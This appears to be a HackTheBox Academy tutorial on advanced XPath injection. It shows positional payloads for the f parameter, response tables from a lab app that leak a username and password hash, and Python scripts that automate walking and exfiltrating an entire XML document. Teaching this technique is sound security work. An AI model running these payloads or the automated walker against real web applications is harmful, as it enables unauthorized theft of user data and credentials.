Injection Attacks  

XPath - Advanced Data Exfiltration


Sometimes, it is impossible to extract the entire XML document at once. Consider a web application that only displays the first five results of an XPath query. If we inject our previous payload so that the query returns the entire XML document, we can only exfiltrate the first five results. Thus, we need to modify our payload to manually iterate through the XML document and exfiltrate all data piece by piece.


Advanced Data Exfiltration

For this section, we are working on a slightly modified version of the web application from the previous section that limits the number of results returned so that we cannot exfiltrate the entire XML document at once. To iterate through the XML schema, we must first determine the schema depth. We can achieve this by ensuring the original XPath query returns no results and appending a new query that gives us information about the schema depth. We set the search term in the parameter q to anything that does not return data, for instance, SOMETHINGINVALID. We can then set the parameter f to fullstreetname | /*[1]. This results in the following XPath query:

/a/b/c[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | /*[1]
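The two GET parameters for such a probe can be assembled programmatically. The following is a minimal sketch, assuming the parameter names q and f described above; the helper names build_f and build_query_string are hypothetical and only serve as illustration:

```python
from urllib.parse import urlencode


def build_f(positions, field="fullstreetname"):
    """Return the f value: the original field plus a positional subquery."""
    subquery = "".join(f"/*[{p}]" for p in positions)
    return f"{field} | {subquery}"


def build_query_string(positions, q="SOMETHINGINVALID"):
    """URL-encode both GET parameters for a single probe request."""
    return urlencode({"q": q, "f": build_f(positions)})


print(build_f([1]))             # fullstreetname | /*[1]
print(build_query_string([1]))  # URL-encoded form of q and f
```

URL-encoding matters here because the payload contains characters such as |, /, [ and ] that should not be sent raw in a query string.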

The subquery /*[1] starts at the document root /, matches any child element due to the wildcard *, and selects the first match due to the predicate [1]. Thus, this subquery selects the root element of the document. Since the root element has multiple child nodes, PHP represents it as an array rather than a string, which we can confirm when analyzing the response. The web application expects a string but receives an array and is thus unable to print the result, so the response is empty.

We can now determine the schema depth by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes. The results look like this (the q parameter remains the same as above for all requests):

Value of the f GET parameter                 Response
fullstreetname | /*[1]                       Nothing
fullstreetname | /*[1]/*[1]                  Nothing
fullstreetname | /*[1]/*[1]/*[1]             Nothing
fullstreetname | /*[1]/*[1]/*[1]/*[1]        01ST ST
fullstreetname | /*[1]/*[1]/*[1]/*[1]/*[1]   No Results!

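From the above results, we can deduce that the schema depth for the street data is 4: four position steps are needed before the subquery reaches a node that holds a text value, and a fifth step finds nothing.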
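The depth probing can be automated with a small loop. This is a sketch under assumptions: send is a hypothetical callable that issues the request for a given f value and returns the text the page displays (an empty string for "Nothing"), and the literal No Results! is taken from the responses listed above. The canned dictionary only replays those responses so that the example runs without a target.

```python
def find_depth(send, prefix=(1,), max_depth=10):
    """Append /*[1] until the response carries data and return that depth.

    Returns None if no data is found below the given prefix.
    """
    positions = list(prefix)
    while len(positions) <= max_depth:
        f_value = "fullstreetname | " + "".join(f"/*[{p}]" for p in positions)
        response = send(f_value)
        if response == "No Results!":
            return None  # we walked past the leaf nodes
        if response:
            return len(positions)  # a printable value: this is a leaf
        positions.append(1)  # empty response: the node has children, go deeper
    return None


# Replay of the responses from the table above (stand-in for real requests).
canned = {
    "fullstreetname | /*[1]": "",
    "fullstreetname | /*[1]/*[1]": "",
    "fullstreetname | /*[1]/*[1]/*[1]": "",
    "fullstreetname | /*[1]/*[1]/*[1]/*[1]": "01ST ST",
}
print(find_depth(lambda f: canned.get(f, "No Results!")))  # 4
```

The max_depth limit is only a safety net so that an unexpected response pattern cannot cause an endless loop.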

This allows us to start exfiltrating data by increasing the position in the last predicate until no more data can be retrieved:

Value of the f GET parameter            Response
fullstreetname | /*[1]/*[1]/*[1]/*[1]   01ST ST
fullstreetname | /*[1]/*[1]/*[1]/*[2]   01ST
fullstreetname | /*[1]/*[1]/*[1]/*[3]   ST
fullstreetname | /*[1]/*[1]/*[1]/*[4]   No Results!
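Incrementing the last predicate is a simple loop that stops at the first No Results! response. The sketch below again assumes a hypothetical send callable that returns the displayed text for a given f value; the canned responses are copied from the table above.

```python
def read_fields(send, record_path, max_fields=50):
    """Collect the values of all child nodes of the node at record_path."""
    base = "".join(f"/*[{p}]" for p in record_path)
    values = []
    for position in range(1, max_fields + 1):
        response = send(f"fullstreetname | {base}/*[{position}]")
        if response == "No Results!":
            break  # no child at this position: the record is complete
        values.append(response)
    return values


# Replay of the responses from the table above (stand-in for real requests).
canned_fields = {
    "fullstreetname | /*[1]/*[1]/*[1]/*[1]": "01ST ST",
    "fullstreetname | /*[1]/*[1]/*[1]/*[2]": "01ST",
    "fullstreetname | /*[1]/*[1]/*[1]/*[3]": "ST",
}
print(read_fields(lambda f: canned_fields.get(f, "No Results!"), (1, 1, 1)))
```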

We successfully exfiltrated information about the first street in the data set. The three values seem to be the long street name, the short street name, and a street type. We can thus fill in some of the placeholders of the XML schema from the previous section. However, remember that we still do not know the exact node names. We are just trying to create an overview of the structure of the XML document:

<a>
	<b>
		<street>
			<fullstreetname>01ST ST</fullstreetname>
			<streetname>01ST</streetname>
			<street_type>ST</street_type>
		</street>
	</b>
</a>

We can now extract information about the second street in the data set by incrementing the second-to-last position predicate in our injected payload:

Value of the f GET parameter            Response
fullstreetname | /*[1]/*[1]/*[2]/*[1]   02ND AVE
fullstreetname | /*[1]/*[1]/*[2]/*[2]   02ND
fullstreetname | /*[1]/*[1]/*[2]/*[3]   AVE
fullstreetname | /*[1]/*[1]/*[2]/*[4]   No Results!
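Walking over all records of a data set then amounts to two nested loops: the outer one increments the second-to-last predicate, the inner one the last. The following sketch assumes a hypothetical send callable returning the displayed text, and it assumes that every record has at least one child node, so a record whose first field yields No Results! marks the end of the data set.

```python
def read_records(send, dataset_path, max_items=100):
    """Return a list of records, each a list of field values."""
    base = "".join(f"/*[{p}]" for p in dataset_path)
    records = []
    for record in range(1, max_items + 1):
        fields = []
        for field in range(1, max_items + 1):
            response = send(f"fullstreetname | {base}/*[{record}]/*[{field}]")
            if response == "No Results!":
                break
            fields.append(response)
        if not fields:
            break  # even the first field is missing: no more records
        records.append(fields)
    return records


# Replay of the responses for the first two streets (stand-in for real requests).
canned_streets = {
    "fullstreetname | /*[1]/*[1]/*[1]/*[1]": "01ST ST",
    "fullstreetname | /*[1]/*[1]/*[1]/*[2]": "01ST",
    "fullstreetname | /*[1]/*[1]/*[1]/*[3]": "ST",
    "fullstreetname | /*[1]/*[1]/*[2]/*[1]": "02ND AVE",
    "fullstreetname | /*[1]/*[1]/*[2]/*[2]": "02ND",
    "fullstreetname | /*[1]/*[1]/*[2]/*[3]": "AVE",
}
for row in read_records(lambda f: canned_streets.get(f, "No Results!"), (1, 1)):
    print(row)
```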

We can do this until we have exfiltrated information about all streets. However, since we are not interested in streets, let us see if the XML document contains other data sets. Incrementing the first position predicate in the payload makes little sense, as it selects the root element, and a well-formed XML document has exactly one root element. However, we can alter the second position predicate to find additional data sets within the XML document. Remember that we need to determine the schema depth again, as it might differ from the depth of the streets data set. To illustrate this, consider the following sample XML document:

<dataset>
	<streets>
		<street>
			<fullstreetname>01ST ST</fullstreetname>
			<streetname>01ST</streetname>
			<street_type>ST</street_type>
		</street>
	</streets>
	<users>
		<group name="users">
			<user>
				<username>test</username>
				<password>test</password>
			</user>
		</group>
		<group name="admins">
			<user>
				<username>admin</username>
				<password>admin</password>
			</user>
		</group>
	</users>
</dataset>

In the above XML document, the street nodes are at depth 3: /dataset/streets/street. However, the user nodes are at depth 4: /dataset/users/group/user. Their child nodes, which hold the actual values, therefore sit at depth 4 and depth 5, respectively. Since the depth differs between data sets, we must determine it again to exfiltrate the users. We can do so using the following parameter values. Since we are targeting the second data set in the XML document, we need to use /*[1]/*[2] as a starting point:

Value of the f GET parameter                      Response
fullstreetname | /*[1]/*[2]                       Nothing
fullstreetname | /*[1]/*[2]/*[1]                  Nothing
fullstreetname | /*[1]/*[2]/*[1]/*[1]             Nothing
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1]        htb-stdnt
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1]/*[1]   No Results!
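The difference in depth between data sets can also be reproduced locally on the sample XML document shown earlier. The sketch below parses that sample with Python's xml.etree.ElementTree and follows the first child at every level, which mirrors repeatedly appending /*[1]; the helper name first_leaf_depth is hypothetical, and the code runs against the sample document only, not against the target application.

```python
import xml.etree.ElementTree as ET

SAMPLE = """
<dataset>
  <streets>
    <street>
      <fullstreetname>01ST ST</fullstreetname>
      <streetname>01ST</streetname>
      <street_type>ST</street_type>
    </street>
  </streets>
  <users>
    <group name="users">
      <user><username>test</username><password>test</password></user>
    </group>
    <group name="admins">
      <user><username>admin</username><password>admin</password></user>
    </group>
  </users>
</dataset>
"""


def first_leaf_depth(node, depth):
    """Follow the first child at each level and return the depth of the leaf."""
    children = list(node)
    if not children:
        return depth
    return first_leaf_depth(children[0], depth + 1)


root = ET.fromstring(SAMPLE.strip())  # the root element itself is at depth 1
for position, dataset in enumerate(root, start=1):
    print(f"/*[1]/*[{position}]", dataset.tag, first_leaf_depth(dataset, 2))
# /*[1]/*[1] streets 4
# /*[1]/*[2] users 5
```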

We can see that the schema depth is 5. Furthermore, we seem to have exfiltrated a username. Just like we did with the streets data before, we can exfiltrate all user data by incrementing the last position predicate:

Value of the f GET parameter                 Response
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1]   htb-stdnt
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[2]   295362c2618a05ba3899904a6a3f5bc0
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[3]   HackTheBox Academy Student Account
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[4]   No Results!

From the data we exfiltrated, we seem to have leaked a user object consisting of a username, a password hash, and a description. To exfiltrate all users, we can now iteratively increment the position indices from right to left, just like we did with the street data set.

Note: To exfiltrate an entire XML document, it makes sense to implement a simple script that does the exfiltration for us.
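Such a script could look roughly like the following recursive walker. This is a sketch under assumptions, not a finished tool: send is a hypothetical callable that performs the request for a given f value and returns the displayed text, and the interpretation of the responses (empty string for a node with children, No Results! for a missing node) is taken from the tables above. The make_local_send helper is a local stand-in that imitates this behavior on an XML string so that the walker can be tried without a target; against the real application, send would have to issue the GET request and extract the result from the returned page.

```python
import re
import xml.etree.ElementTree as ET


def exfiltrate(send, path=(1,), max_children=100):
    """Walk the document by position and return nested lists of leaf values."""
    f_value = "fullstreetname | " + "".join(f"/*[{p}]" for p in path)
    response = send(f_value)
    if response == "No Results!":
        return None  # no node at this position
    if response:
        return response  # leaf node: its text value
    children = []  # empty response: the node has children, so descend
    for position in range(1, max_children + 1):
        child = exfiltrate(send, path + (position,), max_children)
        if child is None:
            break
        children.append(child)
    return children


def make_local_send(xml_text):
    """Local simulation of the target's observable behavior (assumption)."""
    root = ET.fromstring(xml_text)

    def send(f_value):
        positions = [int(p) for p in re.findall(r"/\*\[(\d+)\]", f_value)]
        if not positions or positions[0] != 1:
            return "No Results!"  # only one root element exists
        node = root
        for position in positions[1:]:
            children = list(node)
            if position > len(children):
                return "No Results!"
            node = children[position - 1]
        return "" if len(node) else (node.text or "")

    return send


SAMPLE = (
    "<dataset><streets><street><fullstreetname>01ST ST</fullstreetname>"
    "<streetname>01ST</streetname><street_type>ST</street_type></street></streets>"
    "<users><group><user><username>test</username><password>test</password>"
    "</user></group></users></dataset>"
)
print(exfiltrate(make_local_send(SAMPLE)))
```

The walker recovers values and structure only; as noted earlier, node names remain unknown with this technique. Each node costs one request, so the number of requests grows with the size of the document.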
